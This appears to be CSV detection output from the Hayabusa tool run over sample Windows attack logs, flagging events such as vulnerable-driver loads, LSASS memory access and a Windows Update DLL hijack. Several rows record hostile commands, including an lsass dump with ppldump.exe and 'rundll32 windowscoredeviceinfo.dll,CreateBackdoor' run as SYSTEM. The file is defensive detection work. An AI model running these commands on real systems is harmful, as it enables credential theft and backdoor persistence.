747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.981 +00:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.981 +00:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:13.098 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:13.147 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 10:08:24.535 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.535 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.666 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.666 +00:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.666 +00:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:25.164 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:25.193 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:25.193 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:27.797 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-11 11:05:37.148 +00:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-02-11 11:05:37.148 +00:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-03-07 13:17:38.534 +00:00,MSEDGEWIN10,4698,info,,Task Created,"Name: \FullPowersTask | Content: \FullPowersTask S-1-5-19 LeastPrivilege SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege IgnoreNew true true true false false PT10M PT1H true false true true false false false false false PT72H 7 C:\Users\Public\Tools\TokenManip\FullPowers.exe -t 4932 | User: LOCAL SERVICE | LID: 0x3e5",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-07 13:17:39.984 +00:00,MSEDGEWIN10,4699,info,,Task Deleted,Name: \FullPowersTask | User: LOCAL SERVICE | LID: 0x3e5,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-07 13:17:39.984 +00:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-08 22:11:34.340 +00:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-08 22:11:34.340 +00:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-08 22:11:34.340 +00:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 05:00:16.296 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:16.507 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.016 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.980 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.980 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.982 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.992 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.996 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.997 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.998 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.003 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.005 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.007 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.011 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.011 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.018 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.024 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.042 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.046 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.050 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:19.873 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:19.877 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | 